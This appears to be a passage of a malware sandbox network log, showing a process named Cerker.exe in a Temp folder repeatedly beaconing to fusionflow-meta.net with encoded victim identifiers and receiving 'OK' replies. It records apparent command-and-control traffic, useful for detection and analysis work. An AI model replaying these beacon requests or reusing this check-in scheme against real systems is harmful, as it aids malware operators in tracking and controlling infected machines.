2024-08-31 20:43:12 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:13 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDTrdWLRsz8qevod830pNHKTCbtu%2BtVoKCGBmiJmmexccNhZoQE8cOoqtAIy99XmfyM7qSAiAYz6way6s%2FxCcIoxwaPfj%2ByYMW5%2FEjD%2Fp7USK6rxfy6rdJ0Uz2fYB6pCNo%2BH2OT6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfd9fd1b8c8cec-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:13 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49881	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:14 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:14 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrvBNxhMk1RyANzQ94m5YxHygQeNe%2BrQUV8w5cDvr0AhFYa%2FEPmeNRU4Gyl6JcVrVCV90MfDJTOCbbMPE6yM%2BiwZO%2FMx3easnQuqYEfeCf9To4gIWftVtqS9GNRGLj2O5dO%2FVoBT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda04f9cd1875-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:14 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49884	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:15 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:15 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3sHc1yXNyVuDkbXYhhz3PkiNaw4KFXZYZKgNtmvJi%2BUGqk6ixclSg6ETY7SnYuuUwwMrq1xKg1AsiXM3gsI7CQEPJo0GxM8ZsWuUKM6RSBLKReZJfagY7EXbRkemoQN1YGxq9%2Fg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda0ceefd43fb-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:15 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49886	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:16 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:17 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zJRcrD1p8jgPYelqmadYiRxcnO%2FhVBO1SHWDirIodo10%2B9VOw2Fh4%2Fc4Fyno7Cc386tcE0ALOZFQQij7qey7IUpwwmYNzGyS4r6EjMpD%2FSro3RmWnhC3hF6nzKjNH%2ByW81DrtRg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda142e72728f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:17 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49889	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:17 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:18 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3Hu9p3Jfj3q09lgnFQloy26NQoTwo0AphAKUM0zPT3h6UfxQIDcCzOYfKzoAu7pK%2BTCtcB5KpIig7f1U%2BeWDBJGpH6xCnLjyeEBaTNQwBzBJAuyvBS3vwI%2F%2Bv480BDx%2BWZY1Pg1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda1ceb1fc323-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:18 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49892	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:19 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:19 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GLzAXi5rkhd%2FqmHjLXkNdKRywIZZXwiBNf%2F38qxBxkDBsXif8C3y5LUzi2V1tYKTGJ8rcni5W8%2FRITDmgRN0DAOBBW966xsV5yxAV2bSUj1Vel7O6iRinkzzmM2u%2BauB65YaY4QH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda24c9f78c83-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:19 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49894	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:20 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:21 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1997qFNRX3IL4i4md4dhScjV2zmt%2Bo0ev7wN3%2BttiL4P9aojwyDpgWWmrkDOglSKYX8Ng%2BnYGtBN1W2qM8KvTS%2BCnUclv1t3jpDAcQ7Z87O1cIYoTO%2Fmzf2EeE7fqEUOpAk5%2Fdi%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda2d7cb643d7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:21 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49897	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:21 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:22 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8QM1aXJo71wToGlZUNp8vmuVJNFxlunMW8F8QjtgLXLQ5IT1MYORLZUmASiv7t3mJqB47BJEEM6qmmcerln5Hmh06i0aqZmWSY05x43XVHewNg5L%2F2FpovrygVSo7FiKpCc4xV1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda35ecda8c15-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:22 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49900	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:23 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:23 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mj1dUhJRFmeiR51I2niCNaf1USYCcEx48KCCWKuS9FmK3AMZA2Os%2FPN92tizblCB%2FBispSkhhzgTqIwLAzKBrIRBNNvU%2BB%2BDuazv50GYIyzIV%2BdlafgJYQsgJRJTcz8%2FJxSlf%2Bj4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda3ddb2842e9-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:23 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49903	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:24 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:25 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25%2BXvC3F3VN8n1pPzeMRRn%2FZ1c%2BMXy64aAwYG7KOmrS8EzcmGAbl7bQ34GXsCinUJf5b7lgvL0Np8ZZlJyzMVszVPbkO2%2FuRIj%2Fnm1y4AngR69eAEqWGpAF6LRJmczkYFE7YIk74"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda469edb8cc8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:25 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49905	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:25 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:26 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgfZpEy1zoAhnZmsf3wspxBpBLFPLmcLaKpRDup3tRqbmIHPeZUS%2BRQOJeN5MxMP%2BDGlLVCFv%2BPQwMRr69CwKKT8W7ocnzUBv4YVfs8yfhML6WyyZTnSC2i5sJSN95uecmblWOMG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda4e6db8423d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:26 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49908	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:27 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:27 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hD9bberlnRiSUi04AXhQs3qAIGMo0xDuluYclVxdHBULvZzoFsSFRnns1G7VvJ3ftd6xhRztPKK7Filfr%2FQxxtyHC%2B0w0mlTaMMtL25nPsdRhTT87bcmLgWmIwdLYPyC28J6wlTZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda574ca68ca8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:27 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49911	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:28 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:29 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKHiJ6vx%2F0k4c8M1i7pAQXtPmBL6U0gnwGk8AiLGbpa3wS2ZTZNdBmAeCBYB1ih4PeSctC9AGQnMup8A%2F%2Bmg7MpzcDpoiQ%2Fxr5JZgEKgaDNhDtnNwmNRQbp7xRsDyQliY58%2B42IJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda601fddc351-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:29 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49913	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:30 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:30 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8TrkGJEkzW0NkjPLo4uQwWDk8MJZv%2Bu%2F7184R22hYZ13UZyUm%2FNP8Gxr2B4K%2F%2BV1J6Pu00NL3f7o%2Bg5Gh08mFQoJBqqwkg4WqqKZ5xfDMlnDXJ0NTCw9Y0d2Ewgj7NeSKWI5mIK9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda693df01821-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:30 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49916	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:31 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:32 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7Rct%2BZd4z9lZvEr54%2BCmhbcyvMiagLN%2B7P9bJkXS7zBZQXszs7dxN5KanTjVkTGilITKtjVdEYaOMG6nA%2Bqkr39WSLlms6i9qdx9jydEporIfp%2FIl0vuLTg7jebgN7AOcxI3NeF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda734c847c9f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:32 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49918	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:32 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:33 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU13h0xvmrngkQbjFH3Rjb64EGhoXEuu%2BrqwtSRbX1pNID%2F%2FFRWT1qBWv7kQxpZk26%2BYw1CW3zBte%2BVbzxvjWAGts1eBZza0026LFabmz2lfqsT%2BhZRV8FIwnknYofQ3IEDgFgEs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfda7a3ad11a03-EWR alt-svc: h3=":443"; ma=86400
